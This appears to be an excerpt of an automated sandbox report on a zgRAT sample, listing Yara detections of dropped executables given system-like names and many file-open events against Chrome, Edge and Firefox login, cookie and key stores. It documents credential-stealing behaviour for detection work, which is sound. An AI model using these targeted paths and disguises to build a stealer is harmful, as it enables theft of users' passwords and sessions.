                        Source: Yara matchFile source: 00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, type: DROPPED
                        Yara detected zgRAT
                        Source: Yara matchFile source: 8.0.ComrefNetsvc.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, type: DROPPED
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
